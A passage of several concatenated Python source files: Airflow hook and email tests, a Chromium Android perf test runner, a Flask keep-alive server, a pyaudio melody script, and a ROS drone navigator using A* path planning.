'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': 'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook:
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class TestConnection(unittest.TestCase):
def setUp(self):
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
class TestWebHDFSHook(unittest.TestCase):
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None # type: Optional[hdfs_hook.HDFSHook]
snakebite = None # type: None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class TestHDFSHook(unittest.TestCase):
def setUp(self):
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = 'hdfs://localhost:8020'
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class TestEmail(unittest.TestCase):
def setUp(self):
conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_once_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
with conf_vars({('email', 'email_backend'): 'tests.core.send_email_test'}):
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_once_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class TestEmailSmtp(unittest.TestCase):
def setUp(self):
conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = 'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual('attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get('Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_once_with(
conf.get('smtp', 'SMTP_USER'),
conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_once_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({('smtp', 'smtp_ssl'): 'True'}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
with conf_vars({
('smtp', 'smtp_user'): None,
('smtp', 'smtp_password'): None,
}):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_once_with(
conf.get('smtp', 'SMTP_HOST'),
conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
test_runner.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Runs perf tests.
Our buildbot infrastructure requires each slave to run steps serially.
This is sub-optimal for android, where these steps can run independently on
multiple connected devices.
The buildbots will run this script multiple times per cycle:
- First: all steps listed in --steps in will be executed in parallel using all
connected devices. Step results will be pickled to disk. Each step has a unique
name. The result code will be ignored if the step name is listed in
--flaky-steps.
The buildbot will treat this step as a regular step, and will not process any
graph data.
- Then, with -print-step STEP_NAME: at this stage, we'll simply print the file
with the step results previously saved. The buildbot will then process the graph
data accordingly.
The JSON steps file contains a dictionary in the format:
{ "version": int,
"steps": {
"foo": {
"device_affinity": int,
"cmd": "script_to_execute foo"
},
"bar": {
"device_affinity": int,
"cmd": "script_to_execute bar"
}
}
}
The JSON flaky steps file contains a list with step names which results should
be ignored:
[
"step_name_foo",
"step_name_bar"
]
Note that script_to_execute necessarily have to take at least the following
option:
--device: the serial number to be passed to all adb commands.
"""
import collections
import datetime
import json
import logging
import os
import pickle
import sys
import threading
import time
from pylib import cmd_helper
from pylib import constants
from pylib import forwarder
from pylib.base import base_test_result
from pylib.base import base_test_runner
def OutputJsonList(json_input, json_output):
with file(json_input, 'r') as i:
all_steps = json.load(i)
step_names = all_steps['steps'].keys()
with file(json_output, 'w') as o:
o.write(json.dumps(step_names))
return 0
def PrintTestOutput(test_name):
"""Helper method to print the output of previously executed test_name.
Args:
test_name: name of the test that has been previously executed.
Returns:
exit code generated by the test step.
"""
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.error('File not found %s', file_name)
return 1
with file(file_name, 'r') as f:
persisted_result = pickle.loads(f.read())
logging.info('*' * 80)
logging.info('Output from:')
logging.info(persisted_result['cmd'])
logging.info('*' * 80)
print persisted_result['output']
return persisted_result['exit_code']
def PrintSummary(test_names):
logging.info('*' * 80)
logging.info('Sharding summary')
device_total_time = collections.defaultdict(int)
for test_name in test_names:
file_name = os.path.join(constants.PERF_OUTPUT_DIR, test_name)
if not os.path.exists(file_name):
logging.info('%s : No status file found', test_name)
continue
with file(file_name, 'r') as f:
result = pickle.loads(f.read())
logging.info('%s : exit_code=%d in %d secs at %s',
result['name'], result['exit_code'], result['total_time'],
result['device'])
device_total_time[result['device']] += result['total_time']
for device, device_time in device_total_time.iteritems():
logging.info('Total for device %s : %d secs', device, device_time)
logging.info('Total steps time: %d secs', sum(device_total_time.values()))
class _HeartBeatLogger(object):
# How often to print the heartbeat on flush().
_PRINT_INTERVAL = 30.0
def __init__(self):
"""A file-like class for keeping the buildbot alive."""
self._len = 0
self._tick = time.time()
self._stopped = threading.Event()
self._timer = threading.Thread(target=self._runner)
self._timer.start()
def _runner(self):
while not self._stopped.is_set():
self.flush()
self._stopped.wait(_HeartBeatLogger._PRINT_INTERVAL)
def write(self, data):
self._len += len(data)
def flush(self):
now = time.time()
if now - self._tick >= _HeartBeatLogger._PRINT_INTERVAL:
self._tick = now
print '--single-step output length %d' % self._len
sys.stdout.flush()
def stop(self):
self._stopped.set()
class TestRunner(base_test_runner.BaseTestRunner):
def __init__(self, test_options, device, shard_index, max_shard, tests,
flaky_tests):
"""A TestRunner instance runs a perf test on a single device.
Args:
test_options: A PerfOptions object.
device: Device to run the tests.
shard_index: the index of this device.
max_shards: the maximum shard index.
tests: a dict mapping test_name to command.
flaky_tests: a list of flaky test_name.
"""
super(TestRunner, self).__init__(device, None, 'Release')
self._options = test_options
self._shard_index = shard_index
self._max_shard = max_shard
self._tests = tests
self._flaky_tests = flaky_tests
@staticmethod
def _IsBetter(result):
if result['actual_exit_code'] == 0:
return True
pickled = os.path.join(constants.PERF_OUTPUT_DIR,
result['name'])
if not os.path.exists(pickled):
return True
with file(pickled, 'r') as f:
previous = pickle.loads(f.read())
return result['actual_exit_code'] < previous['actual_exit_code']
@staticmethod
def _SaveResult(result):
if TestRunner._IsBetter(result):
with file(os.path.join(constants.PERF_OUTPUT_DIR,
result['name']), 'w') as f:
f.write(pickle.dumps(result))
def _CheckDeviceAffinity(self, test_name):
"""Returns True if test_name has affinity for this shard."""
affinity = (self._tests['steps'][test_name]['device_affinity'] %
self._max_shard)
if self._shard_index == affinity:
return True
logging.info('Skipping %s on %s (affinity is %s, device is %s)',
test_name, self.device_serial, affinity, self._shard_index)
return False
def _LaunchPerfTest(self, test_name):
"""Runs a perf test.
Args:
test_name: the name of the test to be executed.
Returns:
A tuple containing (Output, base_test_result.ResultType)
"""
if not self._CheckDeviceAffinity(test_name):
return '', base_test_result.ResultType.PASS
try:
logging.warning('Unmapping device ports')
forwarder.Forwarder.UnmapAllDevicePorts(self.device)
self.device.old_interface.RestartAdbdOnDevice()
except Exception as e:
logging.error('Exception when tearing down device %s', e)
cmd = ('%s --device %s' %
(self._tests['steps'][test_name]['cmd'],
self.device_serial))
logging.info('%s : %s', test_name, cmd)
start_time = datetime.datetime.now()
timeout = 5400
if self._options.no_timeout:
timeout = None
full_cmd = cmd
if self._options.dry_run:
full_cmd = 'echo %s' % cmd
logfile = sys.stdout
if self._options.single_step:
# Just print a heart-beat so that the outer buildbot scripts won't timeout
# without response.
logfile = _HeartBeatLogger()
cwd = os.path.abspath(constants.DIR_SOURCE_ROOT)
if full_cmd.startswith('src/'):
cwd = os.path.abspath(os.path.join(constants.DIR_SOURCE_ROOT, os.pardir))
try:
exit_code, output = cmd_helper.GetCmdStatusAndOutputWithTimeout(
full_cmd, timeout, cwd=cwd, shell=True, logfile=logfile)
finally:
if self._options.single_step:
logfile.stop()
end_time = datetime.datetime.now()
if exit_code is None:
exit_code = -1
logging.info('%s : exit_code=%d in %d secs at %s',
test_name, exit_code, (end_time - start_time).seconds,
self.device_serial)
result_type = base_test_result.ResultType.FAIL
if exit_code == 0:
result_type = base_test_result.ResultType.PASS
actual_exit_code = exit_code
if test_name in self._flaky_tests:
# The exit_code is used at the second stage when printing the
# test output. If the test is flaky, force to "0" to get that step green
# whilst still gathering data to the perf dashboards.
# The result_type is used by the test_dispatcher to retry the test.
exit_code = 0
persisted_result = {
'name': test_name,
'output': output,
'exit_code': exit_code,
'actual_exit_code': actual_exit_code,
'result_type': result_type,
'total_time': (end_time - start_time).seconds,
'device': self.device_serial,
'cmd': cmd,
}
self._SaveResult(persisted_result)
return (output, result_type)
def RunTest(self, test_name):
"""Run a perf test on the device.
Args:
test_name: String to use for logging the test result.
Returns:
A tuple of (TestRunResults, retry).
"""
_, result_type = self._LaunchPerfTest(test_name)
results = base_test_result.TestRunResults()
results.AddResult(base_test_result.BaseTestResult(test_name, result_type))
retry = None
if not results.DidRunPass():
retry = test_name
return results, retry
|
bot_status.py
|
from flask import Flask
from threading import Thread
from waitress import serve
app = Flask('')
@app.route('/')
def home():
return "Bot is online!"
def run():
serve(app, host="0.0.0.0", port=8080) # production server using waitress
# app.run(host='0.0.0.0',port=8080) #development server
def keep_alive():
t = Thread(target=run)
t.start()
|
melody.py
|
import random
import pyaudio
from comp_osc import SineOsc
import multiprocessing as mp
import time
sine_osc = SineOsc()
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,
channels=1,
rate=44100,
output=1,
)
def func1():
print ('func1')
sweepRange = 100
start = 600
freq = random.choice([start, start, start, start, start, start, start * 9/8,])
length = .025
for i in range(sweepRange):
sine_osc.play_frequencies(stream, length, .25, 200, 200,
freq,
freq,
freq * 2
)
freq += 3
if sweepRange - i < 6:
length += .1
for i in range(2):
sine_osc.play_frequencies(stream, .3, .5, 200, 200,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 2000, 200,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 200, 2000,
freq,
freq,
freq * 2,
)
freq = freq * 24/25
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 500, 2000,
freq,
freq,
freq * 2,
)
freq = freq * 25/24
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 25/24
sine_osc.play_frequencies(stream, .3, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 7/6
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 6/7
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 9/10
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 24/25
for i in range(2):
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/11
sine_osc.play_frequencies(stream, .2, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 7/6
sine_osc.play_frequencies(stream, .3, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 7/6
sine_osc.play_frequencies(stream, .35, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .3, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
sine_osc.play_frequencies(stream, .4, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .4, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
sine_osc.play_frequencies(stream, .45, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
freq = freq * 8/9
sine_osc.play_frequencies(stream, .8, .8, 2000, 3000,
freq,
freq,
freq * 2,
)
sine_osc.play_frequencies(stream, .9, .5, 2000, 3000,
freq,
freq,
freq * 2,
)
# def func2():
# print ('func2')
# freq = 300
# freq = random.choice([freq])
# for i in range(10):
# sine_osc.play_frequencies(stream, 3, .75, 1000, 30000,
# freq * 2/3,
# freq / 3
# )
#
# sine_osc.play_frequencies(stream, 1, .5, 2000, 30000,
# freq * 3/2,
# freq * 4/3
# )
# sine_osc.play_frequencies(stream, 2, .5, 5000, 20000,
# freq * 7/4,
# freq * 5/4
# )
#
# sine_osc.play_frequencies(stream, 1, .75, 10000, 10000,
# freq * 2/3,
# freq / 3
# )
# sine_osc.play_frequencies(stream, 2, .5, 20000, 10000,
# freq * 5/4
# )
#
#
# def func3():
# print ('func3')
# for i in range(11):
# sine_osc.play_frequencies(stream, 12, .6, 1000, 50000,
# 50,
# 48,
# )
if __name__=='__main__':
# mp.set_start_method('spawn')
# p1 = mp.Process(target=func1)
# p1.start()
time.sleep(10)
for i in range(4):
print (i)
time.sleep(20)
func1()
# I will pass you multiple series of notes and you will prepare to play them.
# When they are all ready, you will combine them and produce a single audio file.
# Phrases do not need to start at the same time.
# Phrases do not need to have any shared metrics.
# Rhythmic interaction will be described using mathematical relationships.
# I can put a flag in one phrase that signals when a second phrase will start
# I can wait to start a phrase.
# I can put space in a phrase.
|
Navigator.py
|
#encoding=utf-8
'''
project overview:
Subscribe:
1.slam pose(global/local pose) *
2.octomap_server/global map
3.local pointcloud/local octomap
4.target input(semantic target/visual pose target/gps target)
Publish:
1.Mavros(amo) Command
2.Navigator status
Algorithms:
1.D*
2.state transfer
3.position->position PID controller
4.global/semantic/visual target to local pose
'''
import threading
import time
# for ros
import rospy
from geometry_msgs.msg import PoseStamped, Twist
from std_msgs.msg import Float32, String
from sensor_msgs.msg import Imu, NavSatFix, PointCloud, PointCloud2
import sensor_msgs.point_cloud2 as pc2
from visualization_msgs.msg import Marker,MarkerArray
# for mavros
from mavros_msgs.msg import GlobalPositionTarget, State, PositionTarget#, Command
from mavros_msgs.srv import CommandBool, SetMode
# for octomap
from octomap_msgs.msg import Octomap, OctomapWithPose, octomap_msgs
# other useful utilities
#from pyquaternion import Quaternion
import pyquaternion
import astar.astar
import astar.driver
import time
import math
from enum import Enum
import thread
#from queue import Queue
#from Pos2PosController import Pos2PosController as Controller # TODO:re-implement this.
from SimController import Controller as Controller
import DiscreteGridUtils
import numpy as np
# define system status
class status(Enum):
INITIALIZED = 1
LOOKING_FOR_PATH = 2
LOOKING_FOR_PATH_SUCCEED = 3
LOOKING_FOR_PATH_FAILED = 4
GOING_TO_TARGET = 5
GOING_TO_VISION_TARGET = 6
def dist(pos1,pos2):
if not pos1 or not pos2:
return False, 0
else:
return True, reduce(lambda x,y:x+y,map(lambda i:(pos1[i]-pos2[i])**2,[0,1,2]))
class Navigator:
def __init__(self,config_file_path = None):
if config_file_path:
pass
rospy.init_node("gi_navigator_node")
self.dg = DiscreteGridUtils.DiscreteGridUtils(grid_size=0.2)#0.2)
self.rate = rospy.Rate(50)
self.driver = astar.driver.Driver()
self.controller = Controller()
self.mavros_state = "OFFBOARD"
self.set_status(status.INITIALIZED)
self.cur_command_id = 0
self.prev_command_id = 0
self.cur_target_position=None
self.task_id = -1
self.obstacle_set_mutex = threading.Lock() # mutex.acquire(timeout);mutex.release()
self.nav_command_mutex = threading.Lock() # for nav command in dstar and ros high level command.
self.local_pose = None
t1 = threading.Thread(target=self.ros_thread)
t1.start()
self.navigator_status_pub = rospy.Publisher('/gi/navigator_status', String, queue_size=10)
self.path_plan_pub = rospy.Publisher('/gi/navi_path_plan',MarkerArray,queue_size=10)
#t2 = thread.start_new_thread(self.Dstar_thread, ())
#self.keep_navigating()
'''
Navigating thread
'''
def keep_navigating(self):
while self.mavros_state == "OFFBOARD" and not(rospy.is_shutdown()):
# print ('Inside outer loop!')
#print ("Navigator state: ", self.STATUS.data, "Mavros state: ", self.mavros_state)
relative_pos = (0, 0, 0)
end_pos = self.get_latest_target()
current_pos = self.get_current_pose() # TODO:fix this.
if current_pos is None:
print ('current pose not valid!')
continue
while current_pos != end_pos and not self.navi_task_terminated() and not(rospy.is_shutdown()): # Till task is finished:
# print ('Inside inner loop!')
current_pos = self.get_current_pose()
self.algo = astar.astar.A_star(end_pos)
print ('Move 1 step')
obstacle_map = self.driver.get_obstacles_around() # TODO:加入障碍记忆.
print ('From ', current_pos)
t1 = time.time()
self.driver.algo = astar.astar.A_star(end_pos)
path = self.algo.find_path(current_pos, self.driver.get_obstacles_around())
t2 = time.time()
print('A* time cost:', (t2 - t1))
if not path:
#TODO set status
print ('No path found!')
self.do_hover() # TODO
time.sleep(0.05) # TODO
else: # Path found. keep state machine and do task step by step.
#publish path plan.
m_arr = MarkerArray()
marr_index = 0
for next_move in path:
point = self.dg.discrete_to_continuous_target((next_move[0],next_move[1],next_move[2]))
mk = Marker()
mk.header.frame_id="map"
mk.action=mk.ADD
mk.id=marr_index
marr_index+=1
mk.color.g=1.0
mk.color.a=1.0
mk.type=mk.CUBE
mk.scale.x = 0.3
mk.scale.y = 0.3
mk.scale.z = 0.3
mk.pose.position.x = point[0]
mk.pose.position.y = point[1]
mk.pose.position.z = point[2]
m_arr.markers.append(mk)
self.path_plan_pub.publish(m_arr)
# eliminate extra points in the path
path = self.remove_collinear_points(path)
for next_move in path:
self.path_plan_pub.publish(m_arr)
if self.navi_task_terminated():
break
print ('current_pos:', current_pos)
next_pos = next_move
relative_pos = (next_pos[0] - current_pos[0], next_pos[1] - current_pos[1],
next_pos[2] - current_pos[2])
print ('next_move : ', next_move)
print ("relative_move : ", relative_pos)
if not self.driver.algo.is_valid(next_pos, self.driver.get_obstacles_around()):
print ('Path not valid!')
break
self.current_pos = next_pos
#axis transform
relative_pos_new = (-relative_pos[0], -relative_pos[1], relative_pos[2])
#self.controller.mav_move(*relative_pos_new,abs_mode=False) # TODO:fix this.
print ('mav_move() input: relative pos=',next_pos)
self.controller.mav_move(*self.dg.discrete_to_continuous_target((next_pos[0],next_pos[1],next_pos[2])), abs_mode=True) # TODO:fix this.
current_pos = self.get_current_pose()
time.sleep(2)
predict_move = (self.current_pos[0] + relative_pos[0], self.current_pos[1] + relative_pos[1],
self.current_pos[2] + relative_pos[2])
print ("predict_move : ", predict_move)
'''
if not self.algo.is_valid(predict_move, self.driver.get_obstacles_around()):
print ('cant go')
break'''
if not self.algo.path_is_valid(path,self.driver.get_obstacles_around()):
print ('Path conflict detected!')
break
time.sleep(0.05) # wait for new nav task.
'''
if self.found_path:
print("Found path!")
target_position = self.cur_target_position
result = False
while result is False:
result = self.mav_move(target_position[0], target_position[1], target_position[2])
print("Reached Position: ", target_position[0], target_position[1], target_position[2])
print("Finished Current Path")
time.sleep(0.2)
'''
print("Mavros not in OFFBOARD mode, Disconnected!")
'''
move quad in body frame
'''
def distance(self, p1, p2):
x_distance = (p2[0] - p1[0])**2
y_distance = (p2[1] - p1[1])**2
z_distance = (p2[2] - p1[2])**2
return np.sqrt(x_distance + y_distance + z_distance)
def remove_collinear_points(self, original_path):
new_path = []
print ("original_path length: ", len(original_path))
length = len(original_path) - 2
new_path.append(original_path[0])
# new_path.append(original_path[-1])
print(original_path)
for i in range(length):
distance13 = self.distance(original_path[i+2], original_path[i])
distance12 = self.distance(original_path[i+1], original_path[i])
distance23 = self.distance(original_path[i+2], original_path[i+1])
print("distance13 - distance12 - distance23 :", distance13 - distance12 - distance23 )
if abs(distance13 - distance12 - distance23) < 0.001:
# print ("points collinear")
continue
else:
print(original_path[i+1])
print("not found collinear point")
new_path.append(original_path[i+1])
print("new path length: ", len(new_path))
print(new_path)
return new_path
def terminate_navigating(self):
#TODO
pass
def resume_navigating(self):
#TODO
pass
def set_target_postion(self, target_position):
self.found_path = True
self.cur_target_position = target_position
#print("Set Current Position to: ", target_position[0], target_position[1], target_position[2])
def get_latest_target(self):
return self.cur_target_position
def set_vision_target(self):
self.set_status(status.GOING_TO_VISION_TARGET)
self.set_target_position(xxxxx) #TODO
pass
def navi_task_terminated(self):
if dist(self.local_pose,self.cur_target_position) <0.25: #TODO: or stop flag is set.
return True
else:
return False
'''
Dstar Thread
def Dstar_thread(self):
while not rospy.is_shutdown():
while status!= xxx:# TODO
next_move = xxx
return next_move'''
'''##For test:
target = [0.5, 0.5, 0.5]
self.set_target_postion(target)
pass'''
'''
ROS thread
responsible for subscribers and publishers
'''
def ros_thread(self):
print('ros_thread spawn!!!!')
self.octomap_msg = None
# subscribers
self.slam_sub = rospy.Subscriber("/gi/slam_output/pose", PoseStamped, self.slam_pose_callback)
self.vision_target_sub = rospy.Subscriber("/gi/visual_target/pose", PoseStamped, self.vision_target_callback)
self.point_cloud_sub = rospy.Subscriber("/camera/left/point_cloud", PointCloud, self.point_cloud_callback)
self.octomap_cells_vis = rospy.Subscriber("/octomap_point_cloud_centers", PointCloud2, self.octomap_update_callback)
self.local_pose_sub = rospy.Subscriber("/mavros/local_position/pose", PoseStamped, self.local_pose_callback)
self.mavros_sub = rospy.Subscriber("/mavros/state", State, self.mavros_state_callback)
# publishers
#self.mavros_control_pub = rospy.Publisher('mavros/Command', Command, queue_size=10)
self.set_status(status.INITIALIZED)
rospy.spin()
'''
ROS callbacks
'''
def slam_pose_callback(self, msg):
self.slam_pose = msg
def vision_target_callback(self, msg):
self.vision_target = msg
#print("Received New Vision Target!")
def mavros_state_callback(self, msg):
self.mavros_state = msg.mode
#print(msg.mode, type(msg.mode))
self.navigator_status_pub.publish(self.STATUS)
def point_cloud_callback(self, msg):
self.current_point_cloud = msg
def octomap_update_callback(self, msg): # as pointcloud2.
obs_set = set()
